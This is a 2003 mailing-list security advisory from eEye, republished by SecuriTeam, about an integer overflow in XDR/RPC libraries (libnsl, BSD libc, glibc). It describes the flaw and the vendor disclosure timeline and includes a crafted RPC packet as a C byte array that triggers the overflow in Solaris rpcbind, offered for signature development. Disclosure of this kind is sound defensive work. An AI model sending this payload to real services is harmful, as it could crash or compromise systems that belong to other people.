[UNIX] XDR Integer Overflow (Additional Details)
From: support@securiteam.com
Date: 03/19/03
- Previous message: support@securiteam.com: "[UNIX] Ptrace Vulnerability Allows Gaining of Elevated Privileges under Linux"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: 19 Mar 2003 23:25:27 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
In the US?
Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!
Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -
XDR Integer Overflow (Additional Details)
------------------------------------------------------------------------
SUMMARY
The following is a follow-up advisory on our previously reported issue:
<http://www.securiteam.com/unixfocus/5LP0G0081U.html> Integer Overflow in
XDR Library.
XDR is a standard for the description and encoding of data that is used
heavily in RPC implementations. Several libraries exist that allow a
developer to incorporate XDR into his or her applications. Vulnerabilities
were discovered in these libraries during the testing of new Retina
auditing technologies developed by the eEye research department.
ADAM and EVE are two technologies developed by eEye to remotely and
locally audit applications for the existence of common vulnerabilities.
During an ADAM audit, an integer overflow was discovered in the SUN
Microsystems XDR library. By supplying specific integer values in length
fields during an RPC transaction, we were able to produce various overflow
conditions in UNIX RPC services.
DETAILS
Vulnerable systems:
* Sun Microsystems Network Services Library (libnsl)
* BSD-derived libraries with XDR/RPC routines (libc)
* GNU C library with sunrpc (glibc)
Technical Description:
The xdrmem_getbytes() function in the XDR library provided by Sun
Microsystems contains an integer overflow. Depending on the location and
use of the vulnerable xdrmem_getbytes() routine, various conditions may be
presented that can permit an attacker to remotely exploit a service using
this vulnerable routine.
For the purpose of signature development and further security research a
sample session is included below that replicates an integer overflow in
the rpcbind shipped with various versions of the Solaris operating system.
char evil_rpc[] =
"\x23\x0D\xF6\xD2\x00\x00\x00\x00\x00\x00\x00\x02\x00\x01\x86"
"\xA0\x00\x00\x00\x02\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00"
"\x00\x20\x3D\xD2\xC9\x9F\x00\x00\x00\x09\x6C\x6F\x63\x61\x6C"
"\x68\x6F\x73\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x86"
"\xa0\x00\x00\x00\x02\x00\x00\x00\x04"
"\xFF\xFF\xFF\xFF" // RPC argument length
"EEYECLIPSE2003";
Vendor Status:
Sun Microsystems was contacted on November 13, 2002 and CERT was contacted
shortly afterwards. Vendors believed to be vulnerable were contacted by
CERT during a grace period of several months. Due to some difficulties
communicating with vendors, after rescheduling several times a release
date was set for March 18, 2003.
eEye recommends obtaining the necessary patches or updates from vendors as
they become available after the release of this and the CERT advisory.
For a list of vendors and their responses, please review the CERT advisory
at: <http://www.securiteam.com/unixfocus/5LP0G0081U.html> Integer
Overflow in XDR Library
ADDITIONAL INFORMATION
The information has been provided by Riley Hassell and
<mailto:marc@eeye.com> Marc Maiffret of eEye.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[UNIX] Ptrace Vulnerability Allows Gaining of Elevated Privileges under Linux"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
|
